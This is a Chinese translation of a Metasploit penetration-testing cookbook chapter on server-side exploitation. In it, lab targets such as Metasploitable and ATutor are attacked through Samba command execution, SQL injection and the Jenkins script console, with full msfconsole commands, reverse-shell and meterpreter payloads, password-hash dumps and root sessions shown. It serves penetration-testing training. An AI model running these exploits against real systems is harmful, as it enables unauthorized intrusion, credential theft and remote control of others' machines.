Metasploit 滲透測試手冊第三版 第三章 服務端漏洞利用(翻譯)
第三章 服務端漏洞利用
在本章中,咱們將學習如下內容php
一、攻擊Linux服務器html
二、SQL注入攻擊java
三、shell類型node
四、攻擊Windows服務器python
五、利用公用服務mysql
六、MS17-010 永恆之藍 SMB遠程代碼執行Windows內核破壞linux
七、MS17-010 EternalRomance/EternalSynergy/EternalChampionweb
八、植入後門redis
九、拒絕服務攻擊sql
簡介
在第二章的信息收集和掃描中,咱們收集了目標的IP地址,端口,服務,操做系統等信息。信息收集過程當中最大的收穫是服務器或系統的操做系統信息。這些信息對後續的滲透目標機器很是有用,由於咱們能夠快速查找系統上運行的服務和漏洞信息。這個過程有點複雜,可是有了這些信息能夠很大程度減輕咱們後續的工做。
每個操做系統都存在一些缺陷。一旦漏洞被報告出來,漏洞利用程序開發也開始了。得到許可的操做系統,好比Windows,能夠很快爲漏洞或BUG開發補丁程序,並推送給用戶更新。漏洞披露是一個嚴重的問題,特別是 0day 漏洞會對計算機行業形成嚴重破壞。0day 收到高度追捧,在市場上的價格可達 15000美圓到1000000美圓。漏洞被發現並被利用,但漏洞的披露取決於研究人員及其意圖。
像微軟、蘋果和谷歌這樣的知名企業會按期爲他們的產品發佈補丁,由於他們要爲衆多的用戶負責。但在公司場景中,狀況會變得更糟,因爲涉及停機時間和確保業務連續性不受影響,服務器須要數週才能修補。所以,建議您更新或密切關注正在使用的操做系統中發現的任何最新漏洞。未修補的系統是黑客的最愛,由於他們會當即發動攻擊,危及目標。所以,必須按期修補和更新操做系統。在本章中,咱們將重點討論一些最流行的服務和操做系統中報告的漏洞。
在滲透測試的過程當中,一旦目標操做系統的信息可用,滲透人員就開始尋找針對特定服務或操做系統漏洞的可利用程序。所以,本章將是咱們深刻了解目標服務器端漏洞的第一步。咱們將重點介紹一些使用普遍的windows操做系統和Linux操做系統。咱們還將研究如何使用利用這些漏洞,並設置它們的參數,使它們可以在目標機器上執行。最後,咱們將討論 Metasploit 框架中的攻擊載荷(payloads)。
在對目標機器攻擊利用以前,咱們首先要知道一些關於攻擊模塊和攻擊載荷的基礎知識,好比如何設置參數等。
爲了對目標進行漏洞利用攻擊,首先須要掃描目標的端口和服務,一旦收集了足夠多的信息,下一步就是選擇相對應的漏洞利用程序對目標進行攻擊。讓咱們來學習一些 msfconsole中的漏洞利用命令。
關於 msfconsole 和如何啓動 msfconsole ,在咱們以前的章節已經講解過了。
在msfconsole 中,若是要查看幫助,能夠直接輸入 help 命令便可
msf5 > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about session
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
....
set RHOSTS fe80::3990:0000/110, ::1-::f0f0
Target a block from a resolved domain name:
set RHOSTS www.example.test/24
msf5 >
複製代碼
從輸出結果來看,有許多的命令,你可能會被嚇到。但以前咱們已經瞭解了一些命令,好比數據庫命令。如今咱們將重點關注在漏洞利用階段最有用的命令,並在過程當中瞭解其餘命令。
最有用的命令:search命令
msf5 > search -h
Usage: search [ options ] <keywords>
OPTIONS:
-h Show this help information
-o <file> Send output to a file in csv format
-S <string> Search string for row filter
-u Use module if there is one result
Keywords:
aka : Modules with a matching AKA (also-known-as) name
author : Modules written by this author
arch : Modules affecting this architecture
bid : Modules with a matching Bugtraq ID
cve : Modules with a matching CVE ID
edb : Modules with a matching Exploit-DB ID
check : Modules that support the 'check' method
date : Modules with a matching disclosure date
description : Modules with a matching description
full_name : Modules with a matching full name
mod_time : Modules with a matching modification date
name : Modules with a matching descriptive name
path : Modules with a matching path
platform : Modules affecting this platform
port : Modules with a matching port
rank : Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
ref : Modules with a matching ref
reference : Modules with a matching reference
target : Modules affecting this target
type : Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)
Examples:
search cve:2009 type:exploit
msf5 >
複製代碼
經過 search咱們能夠查找很是多的東西,包括模塊,漏洞等等。
一、攻擊Linux服務器
Linux是使用最爲普遍的操做系統之一,在前面的章節中,咱們學習瞭如何掃描可用服務和利用漏洞掃描器掃描查找目標漏洞。在本節中,咱們將使用Metasploitable2做爲靶機,咱們將利用Samba服務漏洞對Linux目標機進行攻擊。
準備工做
首先,咱們使用servives命令查找以前nmap的掃描結果,並過濾139和445端口。
msf5 > services -c port,info -p 139,445 192.168.177.145
Services
========
host port info
---- ---- ----
192.168.177.145 139 Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.177.145 445 Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf5 >
複製代碼
如今咱們知道了目標Samba的版本信息,咱們就能夠去查找相對應的漏洞,而後使用search命令搜索可以使用的攻擊模塊。
TIP:咱們能夠在通用漏洞披露(CVE)在線平臺https://www.cvedetails.com中找到有關Samba 3.0.20漏洞的細節。
經過 search命令過濾 CVE、模塊類型、關鍵字便可找到可利用的攻擊模塊。
msf5 > search cve:2007 type:exploit samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
2 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
3 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
4 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
msf5 >
複製代碼
怎麼作
一、選擇攻擊模塊
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) >
複製代碼
二、運行info可查看模塊信息
msf5 exploit(multi/samba/usermap_script) > info
Name: Samba "username map script" Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2007-05-14
......
Description:
This module exploits a command execution vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication!
References:
https://cvedetails.com/cve/CVE-2007-2447/
OSVDB (34700)
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html
msf5 exploit(multi/samba/usermap_script) >
複製代碼
經過模塊描述信息,可用看出,該模塊利用Samba 3.0.20到3.0.25rc中的命令執行漏洞。咱們來試試。
三、配置參數
經過show missing命令,查看必需要配置的參數
msf5 exploit(multi/samba/usermap_script) > show missing
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
msf5 exploit(multi/samba/usermap_script) >
複製代碼
TIP:要顯示模塊的高級選項,你可使用show advanced 命令
這裏只須要咱們設置目標的IP地址便可,咱們經過set [options] [value]來設置
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.177.145
RHOSTS => 192.168.177.145
msf5 exploit(multi/samba/usermap_script) >
複製代碼
四、攻擊
執行exploit便可。
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 192.168.177.143:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 48vnI4nfAB1GTD5d;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "48vnI4nfAB1GTD5d\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.177.143:4444 -> 192.168.177.145:51353) at 2019-04-26 13:14:08 +0800
複製代碼
攻擊成功後,咱們將得到與目標機器的鏈接會話。咱們可用執行一些命令,來驗證是否得到了目標機器的權限。
hostname
metasploitable
ip a show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff
inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0
inet6 fe80::20c:29ff:fecc:9aea/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
id
uid=0(root) gid=0(root)
複製代碼
按Ctrl+Z可將會話轉到後臺
uid=0(root) gid=0(root)
^Z //按 Ctrl+Z
Background session 1? [y/N] y
msf5 exploit(multi/samba/usermap_script) >
複製代碼
五、要操做會話,可用使用sessions命令
msf5 exploit(multi/samba/usermap_script) > sessions -h
Usage: sessions [options] or sessions [id]
Active session manipulation and interaction.
OPTIONS:
-C <opt> Run a Meterpreter Command on the session given with -i, or all
-K Terminate all sessions
-S <opt> Row search filter.
-c <opt> Run a command on the session given with -i, or all
-d List all inactive sessions
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-n <opt> Name or rename a session by ID
-q Quiet mode
-s <opt> Run a script or module on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List all active sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
msf5 exploit(multi/samba/usermap_script) >
複製代碼
六、要從新回到剛纔的會話,可以使用sessions -i [session_id]命令,使用sessions -l可查看全部激活的會話列表。
msf5 exploit(multi/samba/usermap_script) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.177.143:4444 -> 192.168.177.145:51353 (192.168.177.145)
msf5 exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root)
ip a show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff
inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0
inet6 fe80::20c:29ff:fecc:9aea/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
複製代碼
要終止會話,可用按Ctrl+c。
link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
^C //Ctrl+C
Abort session 1? [y/N] y //輸入 y
""
[*] 192.168.177.145 - Command shell session 1 closed. Reason: User exit
msf5 exploit(multi/samba/usermap_script) >
複製代碼
它是如何工做的
Samba是用於Linux和Windows之間的打印和文件共享的服務。Samba 3.0.0至3.0.25rc3的smbd中的MS-RPC功能容許遠程攻擊者經過SamrChangePassword功能的shell元字符執行任意命令,當啓用smb.conf中「用戶名映射腳本」選項時(不是默認啓用的),容許遠程認證的用戶經過遠程打印機中的其餘MS-RPC功能的外部元字符執行命令,以及文件共享管理。該漏洞攻擊模塊經過指定一個用戶名包含shell元字符,攻擊者能夠執行任意命令。 由於此選項用於在身份驗證以前映射用戶名,因此不須要身份驗證就能夠利用此漏洞。
有效攻擊載荷?
咱們沒有指定payload,因此Metasploit默認爲咱們指定了payload。咱們可用show options查看
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.177.145 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.177.143 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/samba/usermap_script) >
複製代碼
能夠看到,使用的payload是一個unix反向shell。
咱們能夠經過show payloas列出當前攻擊模塊全部可用的攻擊載荷。
msf5 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
2 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
3 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
7 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
8 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
15 cmd/unix/generic normal No Unix Command, Generic Command Execution
16 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
17 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
18 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
19 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
20 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
21 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
22 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
23 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
24 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
25 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
26 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
27 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
28 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
29 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
30 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
31 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
32 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
33 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
34 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
35 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
msf5 exploit(multi/samba/usermap_script) >
複製代碼
咱們還能夠經過sessions -u [sessions_id] 能夠將shell會話升級成meterpreter會話,從而能夠利用meterpreter的高級功能。關於meterpreter會在後續的章節中詳細講解。
msf5 exploit(multi/samba/usermap_script) > sessions -u 2
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]
[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.177.143:4433
[*] Sending stage (985320 bytes) to 192.168.177.145
[*] Meterpreter session 3 opened (192.168.177.143:4433 -> 192.168.177.145:35189) at 2019-04-26 13:46:35 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
複製代碼
二、SQL 注入
Metasploit有幾個SQL注入漏洞的利用模塊,使咱們可以測試和驗證目標是否易受攻擊。
準備工做
咱們將安裝一個易受攻擊的開源LMS:Atutor 2.2.1進行測試,訪問www.exploit-db.com/exploits/39… ,點擊VULNERABLE APP旁邊的下載按鈕開源下載Atutor 2.2.1。
TIP:至於怎麼安裝 ATutor,能夠查看官方文檔。
怎麼作
該模塊利用了ATutor 2.2.1的SQL注入漏洞和身份驗證漏洞,這意味着咱們能夠繞過身份驗證,訪問管理接口,上傳惡意代碼。
一、使用exploit/multi/http/atutor_sqli模塊,查看模塊選項
msf5 > use exploit/multi/http/atutor_sqli
msf5 exploit(multi/http/atutor_sqli) > show options
Module options (exploit/multi/http/atutor_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /ATutor/ yes The path of Atutor
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/http/atutor_sqli) >
複製代碼
二、攻擊以前,能夠經過check命令檢測目標是否易受攻擊。而後進行攻擊
msf5 exploit(multi/http/atutor_sqli) > check
[+] 192.168.177.139:80 - The target is vulnerable.
msf5 exploit(multi/http/atutor_sqli) >
msf5 exploit(multi/http/atutor_sqli) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.139:80 - Dumping the username and password hash...
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.139:80 - Dumping the username and password hash...
[+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
[*] Sending stage (38247 bytes) to 192.168.177.139
[*] Meterpreter session 13 opened (192.168.177.143:4444 -> 192.168.177.139:50088) at 2019-04-28 13:53:36 +0800
[!] This exploit may require manual cleanup of 'ytux.php' on the target
[!] This exploit may require manual cleanup of '/var/content/module/zyq/ytux.php' on the target
meterpreter >
複製代碼
根據密碼複雜度不一樣,所需時長也不一樣。攻擊成功後,獲取了shell
meterpreter > getuid
Server username: Administrator (0)
meterpreter > sysinfo
Computer : WIN-BGKRU85VR4H
OS : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
Meterpreter : php/windows
meterpreter >
複製代碼
三、shell類型
在進行下一節內容的學習以前,咱們先來討論一些可用shell的類型。shell大致上分爲兩種,一種是bind shell一種是reverse shjell。
bindshell 又叫正向鏈接shell。是指程序在目標機本地端口上監聽,容許攻擊者鏈接到監聽端口。bind shell很是適合本地漏洞,好比當你已經經過釣魚攻擊成功危害了目標計算機,並但願利用本地服務提權的時候。可是它不適合遠程攻擊場景。由於一般來講目標位於防火牆後面。
因此大部分時候,咱們更多的使用reverse shell,又稱反向shell做爲咱們的有效攻擊載荷。反向shell是在攻擊者上監聽端口,攻擊程序在目標機上運行後主動鏈接到攻擊者監聽的端口。因爲防火牆大多數時候只限制入站規則。所以反向shell更容易繞過防火牆。
Payloads
Metasploit中由三種不一樣類型的payload模塊,分別是:singles、stagers和stages。
Singles:獨立載荷,可直接植入目標系統並執行的程序,好比 shell_bind_tcp
Stagers:傳輸器載荷,負責創建網絡鏈接,與stages載荷配合使用。這種載荷體積小且可靠
Stages:傳輸體載荷,在stagers創建好穩定的鏈接以後,提供的高級功能。如 shell,meterpreter, dllinject, patchupdllinject, upexec,vncinject等。metasploit中meterpreter其實就是一個payload。它需stagers和stages配合使用。
準備工做
在上一節中的SQL注入中,已經得到一個有效的漏洞利用。因此咱們將使用它來測試不一樣類型的payload
怎麼作
一、使用show payloads命令顯示可用的載荷。
msf5 exploit(multi/http/atutor_sqli) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 generic/custom normal No Custom Payload
2 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl)
5 php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6
6 php/bind_php normal No PHP Command Shell, Bind TCP (via PHP)
7 php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6
8 php/download_exec normal No PHP Executable Download and Execute
9 php/exec normal No PHP Execute Command
10 php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager
11 php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6
12 php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
13 php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support
14 php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager
15 php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager
16 php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline
17 php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl)
18 php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP)
msf5 exploit(multi/http/atutor_sqli) >
複製代碼
二、查看載荷的詳細信息,使用info <payload>指令
msf5 exploit(multi/http/atutor_sqli) > info payload/generic/shell_bind_tcp
Name: Generic Command Shell, Bind TCP Inline Module: payload/generic/shell_bind_tcp Platform: All Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, p
hp, java, ruby, dalvik, python, nodejs, firefox, zarch, r
Needs Admin: No
Total size: 0 Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
msf5 exploit(multi/http/atutor_sqli) >
複製代碼
三、generic/shell_bind_tcp是一個獨立載荷。要選擇它做爲有效載荷,咱們使用set payload <payload_name>
msf5 exploit(multi/http/atutor_sqli) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf5 exploit(multi/http/atutor_sqli) > exploit
[*] 192.168.177.139:80 - Dumping the username and password hash...
複製代碼
四、使用generic/shell_bind_tcp載荷可用獲得一個通用的shell,但遠遠不夠,PHP Meterprete是一個特性豐富且更高級的載荷,咱們能夠用它來利用此漏洞。
msf5 exploit(multi/http/atutor_sqli) > info payload/php/meterpreter/reverse_tcp
Name: PHP Meterpreter, PHP Reverse TCP Stager
Module: payload/php/meterpreter/reverse_tcp
Platform: PHP
Arch: php
Needs Admin: No
Total size: 1101
Rank: Normal
Provided by:
egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in PHP. Reverse PHP connect back stager
with checks for disabled functions
msf5 exploit(multi/http/atutor_sqli) >
複製代碼
msf5 exploit(multi/http/atutor_sqli) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/atutor_sqli) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.139:80 - Dumping the username and password hash...
[+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
[*] Sending stage (38247 bytes) to 192.168.177.139
[*] Meterpreter session 14 opened (192.168.177.143:4444 -> 192.168.177.139:51063) at 2019-04-28 16:42:49 +0800
[!] This exploit may require manual cleanup of 'bgxx.php' on the target
[!] This exploit may require manual cleanup of '/var/content/module/glt/bgxx.php' on the target
meterpreter >
[+] 192.168.177.139:80 - Deleted bgxx.php
meterpreter > getuid
Server username: Administrator (0)
meterpreter > sysinfo
Computer : WIN-BGKRU85VR4H
OS : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
Meterpreter : php/windows
meterpreter >
複製代碼
四、攻擊Windows 服務器
利用以前收集的信息,咱們將對Windows服務器做爲目標進行漏洞利用。本節咱們將使用Metasploitable3做爲靶機。
準備工做
經過收集的信息,查找漏洞,選擇合適的漏洞裏利用模塊。
使用services查看目標Apache服務版本。
msf5 > services -p 8020 192.168.177.144
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.177.144 8020 tcp http open Apache httpd
msf5 >
複製代碼
訪問目標站點
經過瀏覽目標站點,咱們能夠嘗試使用弱口令進行登陸,好比 admin
竟然登陸進去了。
怎麼作
一、查看運行在 8484端口的 Jenkins-CI服務。
msf5 > services 192.168.177.144 -p 8484
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.177.144 8484 tcp http open Jetty winstone-2.8
複製代碼
這裏,並無顯示 Jenkins,瀏覽器訪問看看
確實是一個 Jenkins服務
咱們使用search jenkins搜索可利用的模塊
msf5 > search jenkins
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/gather/jenkins_cred_recovery normal Yes Jenkins Domain Credential Recovery
2 auxiliary/scanner/http/jenkins_command normal Yes Jenkins-CI Unauthenticated Script-Console Scanner
3 auxiliary/scanner/http/jenkins_enum normal Yes Jenkins-CI Enumeration
4 auxiliary/scanner/http/jenkins_login normal Yes Jenkins-CI Login Utility
5 auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum normal No Jenkins Server Broadcast Enumeration
6 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
7 exploit/linux/misc/jenkins_ldap_deserialize 2016-11-16 excellent Yes Jenkins CLI HTTP Java Deserialization Vulnerability
8 exploit/linux/misc/opennms_java_serialize 2015-11-06 normal No OpenNMS Java Object Unserialization Remote Code Execution
9 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
10 exploit/multi/http/jenkins_script_console 2013-01-18 good Yes Jenkins-CI Script-Console Java Execution
11 exploit/multi/http/jenkins_xstream_deserialize 2016-02-24 excellent Yes Jenkins XStream Groovy classpath Deserialization Vulnerability
12 exploit/windows/misc/ibm_websphere_java_deserialize 2015-11-06 excellent No IBM WebSphere RCE Java Deserialization Vulnerability
13 post/multi/gather/jenkins_gather normal No Jenkins Credential Collector
msf5 >
複製代碼
使用Jenkins-CI Script-Console Java Execution模塊
msf5 > use exploit/multi/http/jenkins_script_console
msf5 exploit(multi/http/jenkins_script_console) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8484
RPORT => 8484
msf5 exploit(multi/http/jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf5 exploit(multi/http/jenkins_script_console) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.177.144:8484 - Sending command stager...
[*] Command Stager progress - 2.06% done (2048/99626 bytes)
[*] Command Stager progress - 4.11% done (4096/99626 bytes)
[*] Command Stager progress - 6.17% done (6144/99626 bytes)
....
[*] Command Stager progress - 98.67% done (98304/99626 bytes)
[*] Command Stager progress - 100.00% done (99626/99626 bytes)
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:49555) at 2019-04-26 17:32:58 +0800
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter >
複製代碼
攻擊ManageEngine Desktop Central 9
msf5 exploit(multi/http/jenkins_script_console) > search type:exploit Manageengine
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/multi/http/eventlog_file_upload 2014-08-31 excellent Yes ManageEngine Eventlog Analyzer Arbitrary File Upload
2 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
3 exploit/multi/http/manageengine_auth_upload 2014-12-15 excellent Yes ManageEngine Multiple Products Authenticated File Upload
4 exploit/multi/http/manageengine_sd_uploader 2015-08-20 excellent Yes ManageEngine ServiceDesk Plus Arbitrary File Upload
5 exploit/multi/http/manageengine_search_sqli 2012-10-18 excellent Yes ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection
6 exploit/multi/http/opmanager_socialit_file_upload 2014-09-27 excellent Yes ManageEngine OpManager and Social IT Arbitrary File Upload
7 exploit/windows/http/desktopcentral_file_upload 2013-11-11 excellent Yes ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload
